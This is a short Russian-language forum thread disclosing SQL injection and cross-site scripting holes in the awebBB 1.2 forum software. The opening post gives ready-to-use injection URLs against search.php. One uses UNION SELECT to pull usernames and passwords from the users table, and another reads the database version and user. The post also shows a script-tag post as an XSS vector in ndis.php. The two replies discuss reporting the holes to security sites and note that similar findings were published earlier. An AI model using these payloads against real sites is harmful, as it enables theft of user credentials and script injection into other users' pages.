Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
awebBB 1.2, SQL Injection/XSS
 
1. SQL Injection

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,username,password,0,0,0%20from%20users/*
/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER(),0,0,0/*

2. Cross Site Scripting

/ndis.php

Можно например, создать такой пост:
<script>document.write("");</script>
 
Я так полагаю, сам нашёл? Тогда свяжись с админами секлаба и security.nnov.ru и выложи это. И где-нибудь через сутки твой ник с найденой дырой будут красоваться на этих сайтах  ;)
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
В лучшем случае дополнят, ибо про аналогичные уязвимости писали 2 дня назад. Просто там запросы немного другие были.
Страницы: 1
Читают тему